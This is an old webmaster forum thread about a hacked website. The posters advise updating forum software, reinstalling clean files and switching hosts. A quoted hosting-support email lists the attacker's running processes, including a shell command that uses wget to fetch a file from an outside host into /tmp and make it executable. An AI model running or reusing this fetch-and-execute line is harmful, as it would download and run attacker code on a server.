Hacker attcked my swf header. - Page 2 - Webmaster Forums - Webmaster forum for HTML, PHP, ASP, CSS and more

hugeknot · 09-25-2007, 01:46 PM

Thanks Boater!
That looked like a seriously dodgy file. I have deleted it and kept a copy of it if anyone is interested.
Now I will see what happens.
Any idea how it got onto my server in the first place?

aantn · 09-25-2007, 06:23 PM

Make sure that you're using an up to date version of your forum software. They're probably getting in through a security hole.

hugeknot · 09-27-2007, 08:56 AM

Thanks for your replies!

I think they got into my system because I had html allowed on my forum.
When I research the 'lol.php' I found a site that gave instructions to hackers... look for forums with html enabled.
Of course I have changed this.

I am going to use this site to find another host, because despite plenty of messages and requests, my host has done nothing to help me in this serious matter. It is not unusual to have problems with applications and it is unlikely that the applications I can use are up-to-date.

Can anyone recommend a good host that is pro-active in terms of site security?

Thanks again

stealthiss · 09-29-2007, 06:10 PM

Did you check your server for worms etc? I have had a customer who had the same issue happened to him, he found that it was a worm that tampered with his website and codes.

hugeknot · 09-29-2007, 08:14 PM

I am afraid that I don't know how to check my server for worms. I think I should have a virus check application in my cPanel, but I don't. Maybe my host is checking for me all this time I haven't heard from them.

stealthiss · 09-29-2007, 09:48 PM

hugeknot, if it is the worm what I suspect it is, you will not find it via virus scan because it keeps changing each time it appears. Might want to take the code that is new and google it. That is how we found information what it was.

aantn · 09-30-2007, 04:23 AM

First delete all of your files (in case some of them were changed) and then upload a fresh clean copy of the latest version of whatever forum software that you're using. That should solve the problem.

As for hosting, I use 1and1. They were nice enough to email me and let me know that there was malware on my website, and they gave me some advice and told me what they thought the problem was. (They were right.) They also at first threatened to shut down my website in twenty four hours if I was deliberately distributing viruses.

Overall, I'm very happy with them. Their support is pretty good, although they seem to outsource the phone support to India. On the one occasion that I called up for support, I got an Indian women with a very strong accent, and I had trouble her. Then again, I live in Israel, so when I called it was the middle of the night in the U.S. If I had called at a different time then I might not have gotten an Indian.

If you decide to use 1and1, I'd appreciate if you signed up through me, because then I got a small profit for referring you.

Anyway, I'll be away for a few days. Good luck solving your problem.

boater · 10-07-2007, 03:51 PM

They got in again and this time crashed my host server. Here is an email from my host:

################################################
## CUSTOMER SERVICE RESPONSE ##
################################################
[Tech: Andrew] 10/04/2007 04:12 PM
<<; Status: Closed >>;
-----------------------------
Your account hacked the server again. We can not allow this as it causes 100s of other users issues. This is completely against our tos. It is grounds for termination of your site. If you want us to continue hosting your site we need to know EXACT which script is hacking the server and how you are going to permently stop this. .....Unfortunately, these files within the directories noted above were not uploaded to your server because of poor operating system, kernel, or PHP base operating tools or the security measures for each. These malicious scripts were allowed onto your server due to out-dated PHP software, uploaded by you to your account, which is the your duty to govern. We do not keep direct tabs on the content uploaded to each account on our server and it is not our duty to monitor the same.Due to this, it becomes the account owner's responsibility to track down the individual PHP software within the accounts and find the compromise that allowed the upload of these m!
alicious scripts. This service does not fall under the normal scope of the Technical assistance we provide on a daily basis. If you would like assistance with tracking these issues down, we are required to charge our normal Administrative fee for the time spent looking over the server. This service will be charged at our normal Administration fee of $100/hour. With a three hour minumum. The information we have provided above should provide you enough evidence to take further actions as you require to prevent future scripts from being uploaded and potentially causing more severe problems or network attacks.In order to have your account reactivated you have several possible options depending on your situation:OPTION 1: ASSUMES that you UNDERSTAND WHAT SCRIPT CAUSED THE PROBLEM, AND you have the ability and knowledge to REMOVE the script and prevent any further problems:ACTION REQUIRED:a. Notify us what specific script caused the problem.b. Notify us of your intention to REMOV!
E the script and prevent any further problems.ONCE this has been done,
we will REOPEN YOUR SITE (if possible).OPTION 2: ASSUMES that you DO NOT UNDERSTAND WHAT SCRIPT CAUSED THE PROBLEM, AND you DO NOT have the ability and knowledge to REMOVE the script and prevent any further problems:ACTION REQUIRED:a. Notify us that you DONT KNOW what happened and you dont know how to fix it.If this is the case, Your site will have to be REFORMATTED. The site will be reopened blank, and you will lose all data on our servers. You will have to Reupload and configure your site, and you will not be allowed to use ANY PHP or CGI that you are not fully confident is safe, secure, up to date, and kept up to date continuously.Below are the processes that caused this issue.nobody 15507 0.0 0.6 11636 6660 ? S 20:56 0:00 \_ /usr/local/apache/bin/httpd -DSSLkercheva 24674 0.0 0.6 49948 6928 ? S 21:31 0:00 | \_ /usr/bin/php admin.phpkercheva 28461 0.0 0.0 3764 1032 ? S 21:46 0:00 | \_ sh -c cd /tmp;wget http://usuarios.arnet.com.ar/larry123/borek.txt;chmod 755 readmekerc!
heva 28506 0.1 0.1 4508 2052 ? R 21:46 0:00 | \_ perl securitykercheva 27702 10.3 0.2 4820 2076 ? S 21:41 0:34 Morgan was herekercheva 27706 1.4 0.2 4820 2100 ? R 21:41 0:04 Morgan was herekercheva 27708 9.8 0.2 5004 2216 ? S 21:41 0:32 Morgan was herekercheva 27778 10.3 0.2 4920 2560 ? S 21:42 0:31 Morgan was herekercheva 27780 3.5 0.2 4920 2584 ? R 21:42 0:10 Morgan was herekercheva 27782 9.9 0.2 5104 2696 ? S 21:42 0:29 Morgan was here
-----------------------------
No Response Yet
################################################
## End Customer Service Response ##
################################################

JLHC · 10-15-2007, 03:20 PM

Wow... I think you guys should change a host, start a new site with a new php, etc...